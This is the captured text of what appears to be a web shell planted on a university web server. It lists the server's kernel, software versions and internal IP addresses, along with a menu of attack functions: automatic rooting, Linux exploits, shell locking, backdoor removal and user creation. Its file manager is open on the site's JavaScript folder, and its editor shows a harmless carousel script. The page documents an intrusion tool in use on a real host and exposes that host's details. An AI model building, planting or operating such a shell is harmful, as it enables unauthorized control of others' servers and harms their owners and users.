Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
addons
[ DIR ]
drwxrwxr-x
modules
[ DIR ]
drwxrwxr-x
bootstrap.js
128.55
KB
-rwxrwxr-x
bootstrap.min.js
56.71
KB
-rwxrwxr-x
cambio.js
1.71
KB
-rwxrwxr-x
carousel.js
2.04
KB
-rwxrwxr-x
carrusel.js
2.54
KB
-rwxrwxr-x
header.js
708
B
-rwxrwxr-x
jquery-3.4.1.min.js
86.08
KB
-rwxrwxr-x
mdb.js
471.9
KB
-rwxrwxr-x
mdb.min.js
207.33
KB
-rwxrwxr-x
modales.js
1.53
KB
-rwxrwxr-x
popper.min.js
20.06
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : carousel.js
jQuery(document).ready(function($) { var feedbackSlider = jQuery('.feedback-slider'); feedbackSlider.owlCarousel({ items: 1, nav: true, dots: true, autoplay: true, loop: true, mouseDrag: true, touchDrag: true, navText: ["<i class='fa fa-long-arrow-left'></i>", "<i class='fa fa-long-arrow-right'></i>"], responsive:{ // breakpoint from 767 up 767:{ nav: true, dots: false } } }); feedbackSlider.on("translate.owl.carousel", function(){ $(".feedback-slider-item h3").removeClass("animated fadeIn").css("opacity", "0"); $(".feedback-slider-item img, .feedback-slider-thumb img, .customer-rating").removeClass("animated zoomIn").css("opacity", "0"); }); feedbackSlider.on("translated.owl.carousel", function(){ $(".feedback-slider-item h3").addClass("animated fadeIn").css("opacity", "1"); $(".feedback-slider-item img, .feedback-slider-thumb img, .customer-rating").addClass("animated zoomIn").css("opacity", "1"); }); feedbackSlider.on('changed.owl.carousel', function(property) { var current = property.item.index; var prevThumb = $(property.target).find(".owl-item").eq(current).prev().find("img").attr('src'); var nextThumb = $(property.target).find(".owl-item").eq(current).next().find("img").attr('src'); var prevRating = $(property.target).find(".owl-item").eq(current).prev().find('span').attr('data-rating'); var nextRating = $(property.target).find(".owl-item").eq(current).next().find('span').attr('data-rating'); $('.thumb-prev').find('img').attr('src', prevThumb); $('.thumb-next').find('img').attr('src', nextThumb); $('.thumb-prev').find('span').next().html(prevRating + '<i class="fa fa-star"></i>'); $('.thumb-next').find('span').next().html(nextRating + '<i class="fa fa-star"></i>'); }); $('.thumb-next').on('click', function() { feedbackSlider.trigger('next.owl.carousel', [300]); return false; }); $('.thumb-prev').on('click', function() { feedbackSlider.trigger('prev.owl.carousel', [300]); return false; }); }); //end ready
Close